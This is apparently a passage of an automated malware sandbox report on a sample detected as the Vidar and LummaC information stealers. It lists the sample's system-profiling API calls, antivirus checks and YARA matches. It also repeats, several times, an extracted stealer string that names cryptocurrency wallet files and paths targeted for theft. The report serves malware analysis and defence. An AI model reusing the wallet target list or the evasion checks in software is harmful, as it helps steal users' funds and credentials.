Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: __calloc_crt,__malloc_crt,_free,__malloc_crt,_free,_free,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_num,InterlockedDecrement,InterlockedDecrement,InterlockedDecrement,_free,_free,	3_2_00429B70
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: __getptd,_LcidFromHexString,GetLocaleInfoA,GetLocaleInfoA,GetLocaleInfoA,_strlen,GetLocaleInfoA,_strlen,_TestDefaultLanguage,	3_2_0042B3E3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: GetLocaleInfoW,_GetPrimaryLen,_strlen,	3_2_0042B388
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: ___getlocaleinfo,__malloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,GetCPInfo,___crtGetStringTypeA,___crtLCMapStringA,___crtLCMapStringA,_memmove,_memmove,_memmove,InterlockedDecrement,_free,_free,_free,_free,_free,_free,_free,_free,_free,InterlockedDecrement,	3_2_0042AC60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: ___crtGetLocaleInfoA,GetLastError,___crtGetLocaleInfoA,__calloc_crt,___crtGetLocaleInfoA,__calloc_crt,_free,_free,__invoke_watson,GetLocaleInfoW,GetLocaleInfoW,__calloc_crt,GetLocaleInfoW,_free,GetLocaleInfoW,	3_2_00425503
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: __getptd,_LcidFromHexString,GetLocaleInfoA,_TestDefaultLanguage,	3_2_0042B5B4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,malloc,GetLocaleInfoW,WideCharToMultiByte,__freea,	3_2_004275BC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: EnumSystemLocalesA,	3_2_0042B676
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: ___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,	3_2_00428EE4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: __calloc_crt,__malloc_crt,_free,__malloc_crt,_free,_free,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_mon,_free,_free,_free,InterlockedDecrement,InterlockedDecrement,_free,_free,	3_2_00429E8E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: GetLocaleInfoA,_LocaleUpdate::_LocaleUpdate,___ascii_strnicmp,__tolower_l,__tolower_l,	3_2_0042E68F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoA_stat,	3_2_00427696
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: _strlen,_strlen,_GetPrimaryLen,EnumSystemLocalesA,	3_2_0042B6A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: __getptd,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_strlen,EnumSystemLocalesA,GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoA,strcpy_s,__invoke_watson,GetLocaleInfoA,GetLocaleInfoA,__itow_s,	3_2_0042B743
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: _strlen,_GetPrimaryLen,EnumSystemLocalesA,	3_2_0042B707
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: GetLocaleInfoA,	3_2_0042E7C4
Source: C:\ProgramData\KEGIDHJKKJ.exe	Code function: GetACP,IsValidCodePage,GetLocaleInfoW,	10_2_00D1C085
Source: C:\ProgramData\KEGIDHJKKJ.exe	Code function: GetLocaleInfoW,	10_2_00D1622B
Source: C:\ProgramData\KEGIDHJKKJ.exe	Code function: EnumSystemLocalesW,	10_2_00D1C372
Source: C:\ProgramData\KEGIDHJKKJ.exe	Code function: EnumSystemLocalesW,	10_2_00D1C327
Source: C:\ProgramData\KEGIDHJKKJ.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,	10_2_00D1C498
Source: C:\ProgramData\KEGIDHJKKJ.exe	Code function: EnumSystemLocalesW,	10_2_00D1C40D
Source: C:\ProgramData\KEGIDHJKKJ.exe	Code function: GetLocaleInfoW,	10_2_00D1C6EB
Source: C:\ProgramData\KEGIDHJKKJ.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,	10_2_00D1C814
Source: C:\ProgramData\KEGIDHJKKJ.exe	Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,	10_2_00D1C9E9
Source: C:\ProgramData\KEGIDHJKKJ.exe	Code function: GetLocaleInfoW,	10_2_00D1C91A
Source: C:\ProgramData\KEGIDHJKKJ.exe	Code function: EnumSystemLocalesW,	10_2_00D15D7F

Queries information about the installed CPU (vendor, model number etc)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0			Jump to behavior

Queries the volume information (name, serial number etc) of a device

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior

Source: C:\Users\user\Desktop\f1r6P3j3g7.exe

Code function: 0_2_008F7815 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,

0_2_008F7815

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Code function: 3_2_00410C53 GetProcessHeap,RtlAllocateHeap,GetUserNameA,

3_2_00410C53

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Code function: 3_2_00410D2E GetProcessHeap,HeapAlloc,GetTimeZoneInformation,wsprintfA,

3_2_00410D2E

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

AV process strings found (often used to terminate AV products)

Source: Amcache.hve.6.dr	Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
Source: Amcache.hve.6.dr	Binary or memory string: msmpeng.exe
Source: Amcache.hve.6.dr	Binary or memory string: c:\program files\windows defender\msmpeng.exe
Source: MSBuild.exe, 00000003.00000002.2175828757.0000000000E08000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
Source: Amcache.hve.6.dr	Binary or memory string: MsMpEng.exe

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * From AntiVirusProduct

Stealing of Sensitive Information

Yara detected LummaC Stealer

Source: Yara match	File source: decrypted.memstr, type: MEMORYSTR
Source: Yara match	File source: 11.2.MSBuild.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.KEGIDHJKKJ.exe.d00000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000A.00000002.2180254096.0000000000D2D000.00000004.00000001.01000000.0000000A.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.2205515395.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY

Yara detected Vidar

Source: Yara match

File source: dump.pcap, type: PCAP

Yara detected Vidar stealer

Source: Yara match	File source: dump.pcap, type: PCAP
Source: Yara match	File source: 0.2.f1r6P3j3g7.exe.91dad8.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.MSBuild.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.MSBuild.exe.400000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.f1r6P3j3g7.exe.91dad8.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.f1r6P3j3g7.exe.8f0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.1815003832.000000000091D000.00000004.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.2174458155.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: f1r6P3j3g7.exe PID: 6532, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: MSBuild.exe PID: 6628, type: MEMORYSTR

Found many strings related to Crypto-Wallets (likely being stolen)

Source: MSBuild.exe, 00000003.00000002.2174458155.00000000004D2000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: \|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Exodus\|1\|\Exodus\backups\\|.\|1\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.wallet\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.config\|0\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\wallet\\|.sqlite\|0\|Komodo Wallet (Atomic)\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet (Atomic)\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: MSBuild.exe, 00000003.00000002.2174458155.00000000004D2000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: \|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Exodus\|1\|\Exodus\backups\\|.\|1\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.wallet\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.config\|0\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\wallet\\|.sqlite\|0\|Komodo Wallet (Atomic)\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet (Atomic)\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: MSBuild.exe, 00000003.00000002.2174458155.00000000004D2000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: \|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Exodus\|1\|\Exodus\backups\\|.\|1\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.wallet\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.config\|0\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\wallet\\|.sqlite\|0\|Komodo Wallet (Atomic)\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet (Atomic)\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: MSBuild.exe, 00000003.00000002.2174458155.00000000004D2000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: \|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Exodus\|1\|\Exodus\backups\\|.\|1\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.wallet\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.config\|0\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\wallet\\|.sqlite\|0\|Komodo Wallet (Atomic)\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet (Atomic)\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: MSBuild.exe, 00000003.00000002.2174458155.00000000004D2000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: \|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Exodus\|1\|\Exodus\backups\\|.\|1\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.wallet\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.config\|0\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\wallet\\|.sqlite\|0\|Komodo Wallet (Atomic)\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet (Atomic)\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: MSBuild.exe, 00000003.00000002.2174458155.00000000004D2000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: \|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Exodus\|1\|\Exodus\backups\\|.\|1\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.wallet\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.config\|0\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\wallet\\|.sqlite\|0\|Komodo Wallet (Atomic)\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet (Atomic)\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: MSBuild.exe, 00000003.00000002.2174458155.00000000004D2000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: \|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Exodus\|1\|\Exodus\backups\\|.\|1\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.wallet\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.config\|0\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\wallet\\|.sqlite\|0\|Komodo Wallet (Atomic)\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet (Atomic)\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: MSBuild.exe, 00000003.00000002.2174458155.00000000004D2000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: \|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Exodus\|1\|\Exodus\backups\\|.\|1\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.wallet\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.config\|0\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\wallet\\|.sqlite\|0\|Komodo Wallet (Atomic)\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet (Atomic)\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: MSBuild.exe, 00000003.00000002.2174458155.00000000004D2000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: \|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Exodus\|1\|\Exodus\backups\\|.\|1\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.wallet\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.config\|0\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\wallet\\|.sqlite\|0\|Komodo Wallet (Atomic)\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet (Atomic)\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda 